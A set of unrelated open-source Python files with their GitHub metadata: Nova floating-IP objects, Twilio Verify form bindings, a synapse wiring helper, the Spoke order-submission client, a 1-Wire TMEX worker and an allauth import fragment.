from nova import db
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
FLOATING_IP_OPTIONAL_ATTRS = ['fixed_ip']
# TODO(berrange): Remove NovaObjectDictCompat
class FloatingIP(obj_base.NovaPersistentObject, obj_base.NovaObject,
obj_base.NovaObjectDictCompat):
# Version 1.0: Initial version
# Version 1.1: Added _get_addresses_by_instance_uuid()
# Version 1.2: FixedIP <= version 1.2
# Version 1.3: FixedIP <= version 1.3
# Version 1.4: FixedIP <= version 1.4
# Version 1.5: FixedIP <= version 1.5
# Version 1.6: FixedIP <= version 1.6
VERSION = '1.6'
fields = {
'id': fields.IntegerField(),
'address': fields.IPAddressField(),
'fixed_ip_id': fields.IntegerField(nullable=True),
'project_id': fields.UUIDField(nullable=True),
'host': fields.StringField(nullable=True),
'auto_assigned': fields.BooleanField(),
'pool': fields.StringField(nullable=True),
'interface': fields.StringField(nullable=True),
'fixed_ip': fields.ObjectField('FixedIP', nullable=True),
}
obj_relationships = {
'fixed_ip': [('1.0', '1.1'), ('1.2', '1.2'), ('1.3', '1.3'),
('1.4', '1.4'), ('1.5', '1.5'), ('1.6', '1.6')],
}
@staticmethod
def _from_db_object(context, floatingip, db_floatingip,
expected_attrs=None):
if expected_attrs is None:
expected_attrs = []
for field in floatingip.fields:
if field not in FLOATING_IP_OPTIONAL_ATTRS:
floatingip[field] = db_floatingip[field]
if ('fixed_ip' in expected_attrs and
db_floatingip['fixed_ip'] is not None):
floatingip.fixed_ip = objects.FixedIP._from_db_object(
context, objects.FixedIP(context), db_floatingip['fixed_ip'])
floatingip._context = context
floatingip.obj_reset_changes()
return floatingip
def obj_load_attr(self, attrname):
if attrname not in FLOATING_IP_OPTIONAL_ATTRS:
raise exception.ObjectActionError(
action='obj_load_attr',
reason='attribute %s is not lazy-loadable' % attrname)
if not self._context:
raise exception.OrphanedObjectError(method='obj_load_attr',
objtype=self.obj_name())
if self.fixed_ip_id is not None:
self.fixed_ip = objects.FixedIP.get_by_id(
self._context, self.fixed_ip_id, expected_attrs=['network'])
else:
self.fixed_ip = None
@obj_base.remotable_classmethod
def get_by_id(cls, context, id):
db_floatingip = db.floating_ip_get(context, id)
# XXX joins fixed.instance
return cls._from_db_object(context, cls(context), db_floatingip,
expected_attrs=['fixed_ip'])
@obj_base.remotable_classmethod
def get_by_address(cls, context, address):
db_floatingip = db.floating_ip_get_by_address(context, str(address))
return cls._from_db_object(context, cls(context), db_floatingip)
@obj_base.remotable_classmethod
def get_pool_names(cls, context):
return [x['name'] for x in db.floating_ip_get_pools(context)]
@obj_base.remotable_classmethod
def allocate_address(cls, context, project_id, pool, auto_assigned=False):
return db.floating_ip_allocate_address(context, project_id, pool,
auto_assigned=auto_assigned)
@obj_base.remotable_classmethod
def associate(cls, context, floating_address, fixed_address, host):
db_fixed = db.floating_ip_fixed_ip_associate(context,
str(floating_address),
str(fixed_address),
host)
if db_fixed is None:
return None
floating = FloatingIP(
context=context, address=floating_address, host=host,
fixed_ip_id=db_fixed['id'],
fixed_ip=objects.FixedIP._from_db_object(
context, objects.FixedIP(context), db_fixed,
expected_attrs=['network']))
return floating
@obj_base.remotable_classmethod
def deallocate(cls, context, address):
return db.floating_ip_deallocate(context, str(address))
@obj_base.remotable_classmethod
def destroy(cls, context, address):
db.floating_ip_destroy(context, str(address))
@obj_base.remotable_classmethod
def disassociate(cls, context, address):
db_fixed = db.floating_ip_disassociate(context, str(address))
return cls(context=context, address=address,
fixed_ip_id=db_fixed['id'],
fixed_ip=objects.FixedIP._from_db_object(
context, objects.FixedIP(context), db_fixed,
expected_attrs=['network']))
@obj_base.remotable_classmethod
def _get_addresses_by_instance_uuid(cls, context, instance_uuid):
return db.instance_floating_address_get_all(context, instance_uuid)
@classmethod
def get_addresses_by_instance(cls, context, instance):
return cls._get_addresses_by_instance_uuid(context, instance['uuid'])
@obj_base.remotable
def save(self, context):
updates = self.obj_get_changes()
if 'address' in updates:
raise exception.ObjectActionError(action='save',
reason='address is not mutable')
if 'fixed_ip_id' in updates:
reason = 'fixed_ip_id is not mutable'
raise exception.ObjectActionError(action='save', reason=reason)
# NOTE(danms): Make sure we don't pass the calculated fixed_ip
# relationship to the DB update method
updates.pop('fixed_ip', None)
db_floatingip = db.floating_ip_update(context, str(self.address),
updates)
self._from_db_object(context, self, db_floatingip)
class FloatingIPList(obj_base.ObjectListBase, obj_base.NovaObject):
# Version 1.3: FloatingIP 1.2
# Version 1.4: FloatingIP 1.3
# Version 1.5: FloatingIP 1.4
# Version 1.6: FloatingIP 1.5
# Version 1.7: FloatingIP 1.6
fields = {
'objects': fields.ListOfObjectsField('FloatingIP'),
}
child_versions = {
'1.0': '1.0',
'1.1': '1.1',
'1.2': '1.1',
'1.3': '1.2',
'1.4': '1.3',
'1.5': '1.4',
'1.6': '1.5',
'1.7': '1.6',
}
VERSION = '1.7'
@obj_base.remotable_classmethod
def get_all(cls, context):
db_floatingips = db.floating_ip_get_all(context)
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_host(cls, context, host):
db_floatingips = db.floating_ip_get_all_by_host(context, host)
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_project(cls, context, project_id):
db_floatingips = db.floating_ip_get_all_by_project(context, project_id)
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_fixed_address(cls, context, fixed_address):
db_floatingips = db.floating_ip_get_by_fixed_address(
context, str(fixed_address))
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_fixed_ip_id(cls, context, fixed_ip_id):
db_floatingips = db.floating_ip_get_by_fixed_ip_id(context,
fixed_ip_id)
return obj_base.obj_make_list(context, cls(), FloatingIP,
db_floatingips)
@staticmethod
def make_ip_info(address, pool, interface):
return {'address': str(address),
'pool': pool,
'interface': interface}
@obj_base.remotable_classmethod
def create(cls, context, ip_info, want_result=False):
db_floatingips = db.floating_ip_bulk_create(context, ip_info,
want_result=want_result)
if want_result:
return obj_base.obj_make_list(context, cls(), FloatingIP,
db_floatingips)
@obj_base.remotable_classmethod
def destroy(cls, context, ips):
db.floating_ip_bulk_destroy(context, ips)
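# Illustrative sketch (not part of the original module): how a caller holding a
# RequestContext might drive the APIs above. `ctxt`, the addresses and the host
# name are assumed to come from the normal Nova request flow; nothing here runs
# at import time.
def _example_associate_and_list(ctxt, floating_address, fixed_address, host):
    # Associate the floating address with a fixed one; returns None on failure.
    floating = FloatingIP.associate(ctxt, floating_address, fixed_address, host)
    if floating is None:
        return None
    # List every floating IP currently assigned to the same host.
    return FloatingIPList.get_by_host(ctxt, host)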
| {
"content_hash": "b533c5a28cb1d318c678a8b08418360b",
"timestamp": "",
"source": "github",
"line_count": 220,
"max_line_length": 79,
"avg_line_length": 40.86818181818182,
"alnum_prop": 0.5796908019130241,
"repo_name": "affo/nova",
"id": "1b5fb98ce4575d2712454477990f375dfadbd2c9",
"size": "9600",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "nova/objects/floating_ip.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "3223"
},
{
"name": "Python",
"bytes": "15659662"
},
{
"name": "Shell",
"bytes": "20716"
}
],
"symlink_target": ""
} |
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class FormList(ListResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version):
"""
Initialize the FormList
:param Version version: Version that contains the resource
:returns: twilio.rest.verify.v2.form.FormList
:rtype: twilio.rest.verify.v2.form.FormList
"""
super(FormList, self).__init__(version)
# Path Solution
self._solution = {}
def get(self, form_type):
"""
Constructs a FormContext
:param form_type: The Type of this Form
:returns: twilio.rest.verify.v2.form.FormContext
:rtype: twilio.rest.verify.v2.form.FormContext
"""
return FormContext(self._version, form_type=form_type, )
def __call__(self, form_type):
"""
Constructs a FormContext
:param form_type: The Type of this Form
:returns: twilio.rest.verify.v2.form.FormContext
:rtype: twilio.rest.verify.v2.form.FormContext
"""
return FormContext(self._version, form_type=form_type, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Verify.V2.FormList>'
class FormPage(Page):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, response, solution):
"""
Initialize the FormPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.verify.v2.form.FormPage
:rtype: twilio.rest.verify.v2.form.FormPage
"""
super(FormPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of FormInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.verify.v2.form.FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
return FormInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Verify.V2.FormPage>'
class FormContext(InstanceContext):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, form_type):
"""
Initialize the FormContext
:param Version version: Version that contains the resource
:param form_type: The Type of this Form
:returns: twilio.rest.verify.v2.form.FormContext
:rtype: twilio.rest.verify.v2.form.FormContext
"""
super(FormContext, self).__init__(version)
# Path Solution
self._solution = {'form_type': form_type, }
self._uri = '/Forms/{form_type}'.format(**self._solution)
def fetch(self):
"""
Fetch the FormInstance
:returns: The fetched FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return FormInstance(self._version, payload, form_type=self._solution['form_type'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Verify.V2.FormContext {}>'.format(context)
class FormInstance(InstanceResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
class FormTypes(object):
FORM_PUSH = "form-push"
def __init__(self, version, payload, form_type=None):
"""
Initialize the FormInstance
:returns: twilio.rest.verify.v2.form.FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
super(FormInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'form_type': payload.get('form_type'),
'forms': payload.get('forms'),
'form_meta': payload.get('form_meta'),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {'form_type': form_type or self._properties['form_type'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: FormContext for this FormInstance
:rtype: twilio.rest.verify.v2.form.FormContext
"""
if self._context is None:
self._context = FormContext(self._version, form_type=self._solution['form_type'], )
return self._context
@property
def form_type(self):
"""
:returns: The Type of this Form
:rtype: FormInstance.FormTypes
"""
return self._properties['form_type']
@property
def forms(self):
"""
:returns: Object that contains the available forms for this type.
:rtype: dict
"""
return self._properties['forms']
@property
def form_meta(self):
"""
:returns: Additional information for the available forms for this type.
:rtype: dict
"""
return self._properties['form_meta']
@property
def url(self):
"""
:returns: The URL to access the forms for this type.
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch the FormInstance
:returns: The fetched FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
return self._proxy.fetch()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Verify.V2.FormInstance {}>'.format(context)
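# Illustrative sketch (not part of the generated bindings): given a twilio.base
# Version object for Verify V2 (normally obtained through an authenticated
# Twilio client), fetch the metadata for the push form type. The `version`
# argument is assumed to be supplied by the caller.
def _example_fetch_push_form(version):
    # Resolve the context for the 'form-push' type and fetch the instance.
    form = FormList(version).get(FormInstance.FormTypes.FORM_PUSH).fetch()
    return form.forms, form.form_meta, form.url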
| {
"content_hash": "09730189da9e834ec491d219eec44919",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 95,
"avg_line_length": 28.953586497890296,
"alnum_prop": 0.59895074322355,
"repo_name": "twilio/twilio-python",
"id": "c5205741da28f41f13a1187b70a888cb2a505dc7",
"size": "6877",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "twilio/rest/verify/v2/form.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "234"
},
{
"name": "Makefile",
"bytes": "2157"
},
{
"name": "Python",
"bytes": "11241545"
}
],
"symlink_target": ""
} |
import sys, os
import json
import cPickle as pck
import itertools as it
# external libraries
import numpy as np
from ray import imio, evaluate, morpho
import networkx as nx
def synapses_to_network(vol, syns):
"""Compute a wiring diagram from a volume and synapse locations."""
network = nx.MultiDiGraph()
for pre, posts in syns:
for post in posts:
network.add_edge(vol[tuple(pre)], vol[tuple(post)])
return network
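# Illustrative sketch (not in the original file): build a wiring diagram from a
# tiny 2D labelled volume. Each synapse is a (pre, posts) pair of voxel
# coordinates; the segment labels at those coordinates become the graph nodes.
def _example_wiring():
    vol = np.array([[1, 1, 2],
                    [3, 3, 2],
                    [3, 4, 4]])
    # One presynaptic site in segment 1 contacting segments 2 and 3.
    syns = [((0, 0), [(0, 2), (1, 0)])]
    return synapses_to_network(vol, syns)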
| {
"content_hash": "ef624bd51644476f74efdac598d59a21",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 71,
"avg_line_length": 25.22222222222222,
"alnum_prop": 0.7026431718061674,
"repo_name": "jni/synapse-geometry",
"id": "6f5ae7d4f01e77a5cb33559691a2e930d68c2e66",
"size": "473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "syngeo/wiring.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13168"
}
],
"symlink_target": ""
} |
'''
Python interface to the Spoke API. This is the reference documentation; see
the included README for a higher level overview.
'''
import re
from lxml import etree
import requests
__version__ = '1.0.24'
__all__ = ['Case', 'Comment', 'Image', 'OrderInfo', 'PackSlipCustomInfo', 'Spoke', 'ValidationError', 'SpokeError']
# Validation code
class ValidationError(Exception):
'''
An exception that represents the case that parameter validation failed.
'''
pass
def passthrough(v):
return v
class Validator(object):
is_required = True
is_conditional = False
def __init__(self, inner=None):
if inner is None:
inner = passthrough
elif isinstance(inner, type):
t = inner
def type_validator(value):
if isinstance(value, t):
return value
return t(**value)
# XXX func name?
inner = type_validator
elif not isinstance(inner, Validator):
raise TypeError('inputs to validators must be None, types, or validators')
self.inner = inner
def __call__(self, value):
return self.inner(value)
class Required(Validator):
pass
class RequiredOnlyIfNot(Required):
""" This validator will require the key ONLY IF other keys are NOT present in
the payload.
This validator was added because threadless.com payloads use "ShippingMethod" whereas
Artist Shops payloads use "ShippingAccount" and "ShippingMethodId"
An example would be that SomeKey is only required if SomeOtherKey is not present in the payload:
"SomeKey" = RequiredOnlyIfNot(['SomeOtherKey'])
"""
is_required = True
is_conditional = True
other_keys = []
def __init__(self, other_keys=[], inner=None):
if not isinstance(other_keys, (tuple, list)):
other_keys = [other_keys]
self.other_keys = other_keys
super(RequiredOnlyIfNot, self).__init__(inner)
def __call__(self, value, d):
# if all of other_keys are present in the payload,
        # then don't require this field
if all([key in d.keys() for key in self.other_keys]):
self.is_required = False
return super(RequiredOnlyIfNot, self).__call__(value)
class Optional(Validator):
is_required = False
class Array(Validator):
def __call__(self, value):
if isinstance(value, list):
if len(value) == 0:
raise ValidationError('Empty array found where array required')
return [ self.inner(v) for v in value ]
else:
return [ self.inner(value) ]
class Enum(Validator):
def __init__(self, *values):
self.values = set(values)
def __call__(self, value):
if value not in self.values:
raise ValidationError('value "%s" not in enum' % str(value))
return value
def _validate(d, **validation_spec):
for k, v in d.items():
validator = validation_spec.pop(k, None)
if validator is None:
raise ValidationError('parameter "%s" not allowed' % k)
if validator.is_conditional: # conditional validators need the whole dictionary to look at other keys
d[k] = validator(v, d)
else:
d[k] = validator(v)
    # It's possible that some conditional validators remain in validation_spec
    # because their corresponding key isn't in the payload. Look them over: if all
    # of their other_keys are present in the payload, the validator isn't required.
for k, v in validation_spec.items():
if v.is_conditional and all([key in d.keys() for key in v.other_keys]):
v.is_required = False
validation_spec = dict((k, v) for k, v in validation_spec.items() if v.is_required)
if validation_spec:
first_key = sorted(validation_spec.keys())[0]
raise ValidationError('Missing required parameter "%s"' % first_key)
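# Illustrative sketch (not part of the library): how the validation helpers above
# behave for a simple, made-up spec. Optional keys may be omitted from the
# payload; omitting a Required key raises ValidationError.
def _example_validate():
    params = {'Name': 'widget', 'Color': 'red'}
    _validate(params, Name=Required(), Color=Optional(), Size=Optional())
    return params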
# Actual spoke classes
class Image(object):
'''
Represents an image resource. Used for PrintImage, QcImage, Logo, and PackSlip.
'''
def __init__(self, **kwargs):
'''
Required parameters:
ImageType - The type of image referenced (ex. jpg, png, etc)
Url - The URL of the image referenced.
'''
_validate(kwargs,
ImageType = Required(),
Url = Required(),
)
self.__dict__ = kwargs
class Comment(object):
'''
Represents a comment. Used for comments on Case objects.
'''
def __init__(self, **kwargs):
'''
Required parameters:
Type - One of 'Printer', 'Packaging'
CommentText - The actual comment text
'''
_validate(kwargs,
Type = Required(Enum('Printer', 'Packaging')),
CommentText = Required(),
)
self.__dict__ = kwargs
class PackSlipCustomInfo(object):
'''
Represents custom information for a pack slip.
'''
def __init__(self, **kwargs):
'''
Optional parameters:
Text1
Text2
Text3
Text4
Text5
Text6
'''
_validate(kwargs,
Text1 = Optional(),
Text2 = Optional(),
Text3 = Optional(),
Text4 = Optional(),
Text5 = Optional(),
Text6 = Optional(),
)
self.__dict__ = kwargs
class Prices(object):
'''
Specifies pricing data.
'''
def __init__(self, **kwargs):
'''
Optional parameters:
DisplayOnPackingSlip - Whether or not to show prices on the packing slip
CurrencySymbol - The symbol for the currency used
TaxCents - The tax price, expressed in cents
ShippingCents - The shipping price, expressed in cents
DiscountCents - The discount price (if any), expressed in cents
'''
_validate(kwargs,
DisplayOnPackingSlip = Optional(Enum('Yes', 'No')),
CurrencySymbol = Optional(),
TaxCents = Optional(),
ShippingCents = Optional(),
DiscountCents = Optional(),
)
self.__dict__ = kwargs
class OrderInfo(object):
'''
Specifies order information.
'''
def __init__(self, **kwargs):
'''
The following parameters are required:
FirstName
LastName
Address1
City
State - If the given country doesn't have states/provinces, send the city
PostalCode
CountryCode
OrderDate - May be a datetime.datetime object
PhoneNumber
The following parameters are optional:
Address2
PurchaseOrderNumber - internal PO number
GiftMessage
PackSlipCustomInfo - A PackSlipCustomInfo object
Prices - A Prices object
ShippingLabelReference1
ShippingLabelReference2
'''
_validate(kwargs,
FirstName = Required(),
LastName = Required(),
Address1 = Required(),
Address2 = Optional(),
City = Required(),
State = Required(),
PostalCode = Required(),
CountryCode = Required(),
OrderDate = Required(),
PhoneNumber = Required(),
PurchaseOrderNumber = Optional(),
GiftMessage = Optional(),
PackSlipCustomInfo = Optional(PackSlipCustomInfo),
Prices = Optional(Prices),
ShippingLabelReference1 = Optional(),
ShippingLabelReference2 = Optional(),
)
self.__dict__ = kwargs
class Case(object):
'''
A case represents a phone or tablet cover in the order.
'''
def __init__(self, **kwargs):
'''
The following parameters are required:
CaseId
CaseType
Quantity
PrintImage
The following parameters are optional:
QcImage
Prices
CurrencySymbol
RetailCents
DiscountCents
Comments
'''
_validate(kwargs,
CaseId = Required(),
CaseType = Required(Enum(
'bb9900bt', 'bbz10tough', 'kindlefirebt',
# apple / iphone
'iph3bt', 'iph3tough', 'iph4bt', 'iph4tough', 'iph4tough2',
'ipt4gbt', 'iph5bt', 'iph5vibe', 'iph5cbt', 'ipt5gbt',
'iph5xtreme', 'iph6bt', 'iph6tough', 'iph655bt', 'iph655tough',
'ipad4bt', 'ipadminitough', 'iph6sbtpresale',
'iph6stoughpresale', 'iph6splusbtpresale',
'iph6splustoughpresale', 'iph7bt', 'iph7tough', 'iph7plusbt',
'iph7plustough', 'iph8bt', 'iph8tough', 'iph10bt',
'iph10tough', 'iphxsmaxbt', 'iphxsmaxtough', 'iphxrbt',
'iphxrtough', 'iph11bt', 'iph11tough', 'iph11probt',
'iph11protough', 'iph11promaxbt', 'iph11promaxtough',
'iph12minibt', 'iph12minitough', 'iph12probt',
'iph12protough', 'iph12promaxbt', 'iph12promaxtough',
'iph13bt', 'iph13tough', 'iph13minibt', 'iph13minitough',
'iph13probt', 'iph13protough', 'iph13promaxbt', 'iph13promaxtough',
# buttons
'button-round-125', 'button-round-225',
# samsung / galaxy
'ssgn2tough', 'ssgs3vibe', 'ssgs4bt', 'ssgs4vibe',
'ssgs5bt', 'ssgn4bt', 'ssgs6vibe', 'ssgs6bt', 'ssgs7bt', 'ssgs8bt',
# magnets
'3x3-magnet', '4x4-magnet', '6x6-magnet',
# mugs
'mug11oz', 'mug15oz', 'mug12ozlatte', 'mug15oztravel',
# notebooks
'journal5x7blank', 'journal5x7ruled', 'spiral6x8ruled',
# stickers
'2x2-white', '3x3-white', '4x4-white', '6x6-white',
'2x2-clear', '3x3-clear', '4x4-clear', '6x6-clear',
# socks
'sock-small', 'sock-medium', 'sock-large',
# face masks
'facemasksmall', 'facemasklarge',
# puzzles
'8x10-puzzle', '11x14-puzzle', '16x20-puzzle',
)),
Quantity = Required(),
PrintImage = Required(Image),
QcImage = Optional(Image),
Prices = Optional(),
CurrencySymbol = Optional(),
RetailCents = Optional(),
DiscountCents = Optional(),
Comments = Optional(Array(Comment)),
)
self.__dict__ = kwargs
class SpokeError(Exception):
'''
Represents an error received from the spoke API.
'''
pass
class SpokeDuplicateOrder(SpokeError):
'''
Represents a duplicate order error returned from the Spoke API
'''
ERROR_REGEX = [
(re.compile(r"duplicate orderid", re.I), SpokeDuplicateOrder),
]
class Transport(object):
def __init__(self, url):
self.url = url
def send(self, request):
res = requests.post(self.url, data=request)
res.raise_for_status()
return res.content
ARRAY_CHILDREN_NAMES = dict(
Cases = 'CaseInfo',
Comments = 'Comment',
)
PRODUCTION_URL = 'https://api.spokecustom.com/order/submit'
STAGING_URL = 'https://api-staging.spokecustom.com/order/submit'
class Spoke(object):
'''
The main spoke request object. It contains any
request parameters that won't change between requests.
'''
def __init__(self, **kwargs):
'''
The following fields are required:
production - Whether or not to use the production API
Customer - Your customer ID
Key - Your customer key
The following fields are optional:
transport - A custom transport object. Used mainly for testing and debugging; be warned, here be dragons
Logo
'''
_validate(kwargs,
production = Required(),
transport = Optional(),
Customer = Required(),
Key = Required(),
Logo = Optional(Image),
)
self.__dict__ = kwargs
self.transport = self._create_transport()
def _create_transport(self):
if hasattr(self, 'transport'):
return self.transport
elif self.production:
return Transport(PRODUCTION_URL)
else:
return Transport(STAGING_URL)
def _generate_tree(self, tag_name, serializers, node):
if isinstance(node, list):
elements = etree.Element(tag_name)
for child in node:
elements.append(self._generate_tree(ARRAY_CHILDREN_NAMES[tag_name], serializers, child))
return elements
elif isinstance(node, dict):
parent = etree.Element(tag_name)
for tag_name, subtree in node.items():
parent.append(self._generate_tree(tag_name, serializers, subtree))
return parent
elif type(node) in serializers:
serializer = serializers[type(node)]
return serializer(tag_name, node)
else:
element = etree.Element(tag_name)
if not isinstance(node, basestring):
node = str(node)
element.text = node
return element
def _generate_request(self, RequestType, Order):
def serialize_it(tag_name, value):
return self._generate_tree(tag_name, serializers, value.__dict__)
serializers = {
Case : serialize_it,
Image : serialize_it,
OrderInfo : serialize_it,
Comment : serialize_it,
PackSlipCustomInfo : serialize_it,
Prices : serialize_it,
}
request = self._generate_tree('Request', serializers, dict(
Customer = self.Customer,
RequestType = RequestType,
Key = self.Key,
Order = Order,
))
return etree.tostring(request, pretty_print=True)
def _send_request(self, request):
res = self.transport.send(request)
tree = etree.fromstring(res)
result = tree.xpath('//result')[0].text
if result == 'Success':
immc_id = int(tree.xpath('//immc_id')[0].text)
return dict(immc_id = immc_id)
else:
message = tree.xpath('//message')[0].text
for regex, exception_class in ERROR_REGEX:
if regex.match(message):
raise exception_class(message)
raise SpokeError(message)
def new(self, **kwargs):
'''
Creates a new order. If there is a problem creating the order,
a SpokeError is raised. Otherwise, a dictionary is returned. The
returned dictionary is guaranteed to have an immc_id key-value pair,
which contains the Spoke ID for your order. More key-value pairs may
be present, but they are not guaranteed and their presence may change
in successive versions of this module. Any key-value pairs that appear
in this documentation, however, are guaranteed to appear in successive
versions, barring any changes in the Spoke API itself.
The following fields are required:
OrderId - An internal order ID
        ShippingMethod - The shipping method to use; must be one of 'FirstClass', 'PriorityMail', 'TrackedDelivery', 'SecondDay', 'Overnight'. Required unless both ShippingAccount and ShippingMethodId are supplied instead.
OrderInfo - An OrderInfo object
Cases - A list of Case objects
The following fields are optional:
        PackSlip - An Image object used as the pack slip
        Comments - A list of Comment objects
'''
shipping_method_map = dict(
FirstClass = 'FC',
PriorityMail = 'PM',
TrackedDelivery = 'TD',
SecondDay = 'SD',
Overnight = 'ON',
)
_validate(kwargs,
OrderId = Required(), # XXX number
ShippingMethod = RequiredOnlyIfNot(['ShippingAccount', 'ShippingMethodId'], Enum('FirstClass', 'PriorityMail', 'TrackedDelivery', 'SecondDay', 'Overnight')),
ShippingMethodId = RequiredOnlyIfNot(['ShippingMethod']),
ShippingAccount = RequiredOnlyIfNot(['ShippingMethod']),
PackSlip = Optional(Image),
Comments = Optional(Array(Comment)),
OrderInfo = Required(OrderInfo),
Cases = Required(Array(Case)),
)
if "ShippingMethod" in kwargs:
kwargs['ShippingMethod'] = shipping_method_map[ kwargs['ShippingMethod'] ]
# XXX OrderDate (date or datetime?)
request = self._generate_request(
RequestType = 'New',
Order = kwargs,
)
return self._send_request(request)
def update(self, **kwargs):
'''
Updates an existing order. If there is a problem
updating the order, a SpokeError is raised. Otherwise,
a dictionary of key-value pairs of the same form as the
one returned by new is returned.
Required parameters:
OrderId
OrderInfo
'''
_validate(kwargs,
OrderId = Required(), # XXX number
OrderInfo = Required(OrderInfo)
)
request = self._generate_request(
RequestType = 'Update',
Order = kwargs,
)
return self._send_request(request)
def cancel(self, OrderId):
'''
Cancels an existing order. If there is a problem,
raises a SpokeError. Otherwise, returns a dictionary
of the same form as the one returned by new.
'''
request = self._generate_request(
RequestType = 'Cancel',
Order = dict(OrderId = OrderId),
)
return self._send_request(request)
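# Illustrative sketch (not part of the library): assemble a minimal order against
# the staging API. The customer credentials, image URL, address and order values
# below are placeholders, not real data.
def _example_new_order(customer_id, customer_key):
    spoke = Spoke(production=False, Customer=customer_id, Key=customer_key)
    order_info = OrderInfo(
        FirstName='Jane', LastName='Doe', Address1='123 Main St',
        City='Chicago', State='IL', PostalCode='60601', CountryCode='US',
        OrderDate='2015-01-01', PhoneNumber='555-555-5555')
    case = Case(
        CaseId='case-1', CaseType='iph6bt', Quantity=1,
        PrintImage=Image(ImageType='jpg', Url='http://example.com/print.jpg'))
    # Returns a dict containing at least the Spoke-assigned immc_id on success.
    return spoke.new(OrderId=1001, ShippingMethod='FirstClass',
                     OrderInfo=order_info, Cases=[case])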
| {
"content_hash": "1032808857df7babcf229be9afbcc869",
"timestamp": "",
"source": "github",
"line_count": 570,
"max_line_length": 171,
"avg_line_length": 32.940350877192984,
"alnum_prop": 0.5451640391989774,
"repo_name": "Threadless/python-spoke",
"id": "aece1ce9a3fa284fa459c0eccd323addf57c36ca",
"size": "18776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spoke/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38581"
}
],
"symlink_target": ""
} |
import time
import multiprocessing
from collections import namedtuple
from tmex import Session, TMEXException
Command = namedtuple('Command', ['command', 'deviceId'])
Result = namedtuple('Result', ['command', 'deviceId', 'result'])
def oneWireWorker(channel, port=0):
run = True
try:
session = Session(port=port)
devices = session.enumrate()
except TMEXException, e:
channel.send(e)
run = False
while run:
if channel.poll():
obj = channel.recv()
if isinstance(obj, Command):
if obj.command == 'exit':
run = False
elif obj.command == 'enumerate':
try:
devices = session.enumrate()
for deviceId, information in devices.iteritems():
channel.send(Result('enumerate', deviceId, information))
except TMEXException, e:
channel.send(e)
elif obj.command == 'read':
try:
readout = session.readDevice(obj.deviceId, enableWireLeveling=True)
channel.send(Result('read', obj.deviceId, readout))
except ValueError:
channel.send(TMEXException('Invalid id'))
except TMEXException, e:
channel.send(e)
else:
time.sleep(0.1)
try:
channel.send(Result('exit', None, None))
except IOError:
pass
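# Illustrative sketch (not in the original file): drive the worker from a parent
# process over a multiprocessing Pipe. This assumes the 1-Wire adapter expected
# by the tmex Session is actually attached.
def _example_run_worker():
    parent, child = multiprocessing.Pipe()
    proc = multiprocessing.Process(target=oneWireWorker, args=(child,))
    proc.start()
    parent.send(Command('enumerate', None))
    parent.send(Command('exit', None))
    while True:
        obj = parent.recv()
        print obj
        if isinstance(obj, Result) and obj.command == 'exit':
            break
    proc.join()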
| {
"content_hash": "881a14af2d45d859b73e9e12ee60dbeb",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 91,
"avg_line_length": 35.52272727272727,
"alnum_prop": 0.5169545745361485,
"repo_name": "valnoverm/pytmex-git",
"id": "b0e94246b009a3534afa06cece2f43e532d05b1b",
"size": "1563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qt/worker.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "29728"
}
],
"symlink_target": ""
} |
from allauth.utils import (import_attribute,
get_user_model,
valid_email_or_none)
import app_settings
